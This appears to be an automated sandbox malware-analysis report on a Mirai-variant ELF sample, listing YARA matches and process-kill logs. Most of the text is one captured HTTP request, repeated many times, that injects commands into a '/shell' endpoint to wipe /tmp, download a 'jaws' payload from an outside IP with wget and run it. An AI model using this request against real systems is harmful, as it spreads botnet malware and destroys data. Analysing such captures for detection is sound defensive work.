Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: file1, type: SAMPLE Matched rule: Detects ELF Mirai variant Author: Florian Roth
Source: 5225.1.000000001a887bdc.00000000328ec990.r-x.sdmp, type: MEMORY Matched rule: Detects ELF Mirai variant Author: Florian Roth
Source: 5227.1.000000001a887bdc.00000000328ec990.r-x.sdmp, type: MEMORY Matched rule: Detects ELF Mirai variant Author: Florian Roth
Sample tries to kill multiple processes (SIGKILL)
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 2018, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 2077, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 2078, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 2079, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 2080, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 2083, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 2084, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 2156, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 5234, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 5235, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 5236, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 5237, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 5238, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 5239, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 5250, result: successful Jump to behavior
Yara signature match
Source: file1, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: file1, type: SAMPLE Matched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
Source: 5227.1.000000001c6cffe8.00000000ef7785b3.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5225.1.000000001c6cffe8.00000000ef7785b3.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5225.1.000000001a887bdc.00000000328ec990.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5225.1.000000001a887bdc.00000000328ec990.r-x.sdmp, type: MEMORY Matched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
Source: 5227.1.000000001a887bdc.00000000328ec990.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5227.1.000000001a887bdc.00000000328ec990.r-x.sdmp, type: MEMORY Matched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
Source: Process Memory Space: file1 PID: 5225, type: MEMORYSTR Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: Process Memory Space: file1 PID: 5227, type: MEMORYSTR Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Sample tries to kill a process (SIGKILL)
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 2018, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 2077, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 2078, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 2079, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 2080, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 2083, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 2084, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 2156, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 5234, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 5235, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 5236, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 5237, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 5238, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 5239, result: successful Jump to behavior
Source: /tmp/file1 (PID: 5231) SIGKILL sent: pid: 5250, result: successful Jump to behavior
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
